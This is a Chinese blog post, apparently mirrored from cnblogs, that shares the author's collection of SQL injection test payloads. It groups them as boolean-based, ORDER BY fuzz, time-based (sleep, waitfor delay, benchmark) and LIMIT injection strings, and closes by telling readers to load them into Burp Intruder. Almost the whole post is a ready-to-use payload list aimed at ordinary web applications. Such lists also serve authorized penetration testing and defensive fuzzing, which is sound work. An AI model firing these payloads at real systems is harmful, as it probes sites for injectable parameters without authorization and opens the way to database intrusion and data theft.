zoukankan      html  css  js  c++  java
  • 分享一些平时测试用的sql payloads

    1:BOOL SQLINJECTION


    '
    "
    %df'
    %df"
    and 1=1
    and 1=2
    ' and '1'='1
    ' and '1'='2
    " and "1"="1
    " and "1"="2
    ) and (1=1
    ) and (1=2
    ') and ('1'='1
    ') and ('1'='2
    %' and 1=1 and '%'='
    %' and 1=2 and '%'='x
    %') and 1=1 and ('%'='
    %') and 1=2 and ('%'='x
    OR 1=1
    OR 1=2
    ' OR 1=1-- -
    ' OR 1=2-- -
    ) OR 1=1-- -
    ) OR 1=2-- -
    ') OR 1=1-- -
    ') OR 1=2-- -
    " OR "1"="1
    " OR "1"="2
    ' OR '1'='1
    ' OR '1'='2
    ) OR (1=1
    ) OR (1=2
    ') OR ('1'='1
    ') OR ('1'='2

    2:ORDER BY SQLINJECTION fuzz payload

    (case when(1=1) then 1 else (select 1 union select 2) end)
    (case when(1=2) then 1 else (select 1 union select 2) end)
    ,(1-(case when(1=1) then 1 else (select 1 union select 2) end))
    ,(1-(case when(1=2) then 1 else (select 1 union select 2) end))
    ,1=if((1=1),1,(select 1 union select 2))
    ,1=if((1=2),1,(select 1 union select 2))
    ,If((1=1),1,(select 1 union select 2))-- -
    ,If((1=2),1,(select 1 union select 2))-- -
    ,If((1=1),sleep(4),(select 1 union select 2))-- -
    -IF((1=1),1,(SELECT 1 UNION SELECT 2))-- -
    -IF((1=2),1,(SELECT 1 UNION SELECT 2))-- -
    -(case when(1=1) then 1 else (select 1 union select 2) end)
    -(case when(1=2) then 1 else (select 1 union select 2) end)

    3:TIME-BASE SQLINJECTION

    '%2b(if((1=1 and sleep(4)),1,(select 1 union select 2)))%2b'a
    -IF((1=1),sleep(4),(SELECT 1 UNION SELECT 2))-- -
    ';(SELECT 1 FROM(SELECT(sleep(4)))lWuP)-- -
    ;SELECT sleep(4)
    );SELECT sleep(4)-- -
    ;SELECT sleep(4)-- -
    ;(SELECT 1 FROM(SELECT(sleep(4)))lWuP)-- -
    ' AND SLEEP(4)%23
    AND sleep(4)
    ' AND sleep(4) AND '1'='1
    ') AND sleep(4) AND ('1'='1
    ) AND sleep(4) AND (1=1
    " AND sleep(4) AND "1"="
    ') and (select(0)from(select(sleep(4)))x)-- -
    and (select(0)from(select(sleep(4)))x)
    and (select(0)from(select(sleep(4)))x) and 1=1
    ' and (select(0)from(select(sleep(4)))x) and '1'='1
    " and (select(0)from(select(sleep(4)))x) and "1"="1
    ) and (select(0)from(select(sleep(4)))x) and (1=1
    ') and (select(0)from(select(sleep(4)))x) and ('1'='1
    rlike (select(0)from(select(sleep(4)))x) and 1=1
    ' rlike (select(0)from(select(sleep(4)))x) and '1'='1
    ) rlike (select(0)from(select(sleep(4)))x) and (1=1
    ') rlike (select(0)from(select(sleep(4)))x) and ('1'='1
    ;waitfor delay '0:0:4' -- -
    ';waitfor delay '0:0:4' -- -
    );waitfor delay '0:0:4' -- -
    ');waitfor delay '0:0:4' -- -
    if(now()=sysdate(),sleep(4),0)/*'XOR(if(now()=sysdate(),sleep(4),0))OR'"XOR(if(now()=sysdate(),sleep(4),0))OR"*/
    (SELECT * FROM(SELECT(sleep(4)))lWuP)

    4:LIMIT SQLINJECTION 

    procedure analyse(extractvalue(1,if(1=1,benchmark(5000000,md5(1)),2)),1)

    用法就不用多说,放burp instuder fuzz 就行了

  • 相关阅读:
    15、集合--TreeSet的源码分析(待完成)
    13、集合--HashSet相关方法源码解析(等map更新完成之后在进行补充)
    11、集合--Set接口
    10、集合--Set、AbstractSet、HashSet、TreeSet、SortedSet源码
    9、集合--ArrayList和LinkedList的一些对比
    8、集合--LinkedList的测试以及相关方法的源码分析
    7、集合--ArrayList的测试以及相关方法的源码解析
    6、集合--List接口
    Linux 高可用(HA)集群之keepalived详解
    CentOS7安装配置redis-3.0.0
  • 原文地址:https://www.cnblogs.com/depycode/p/5576204.html
Copyright © 2011-2022 走看看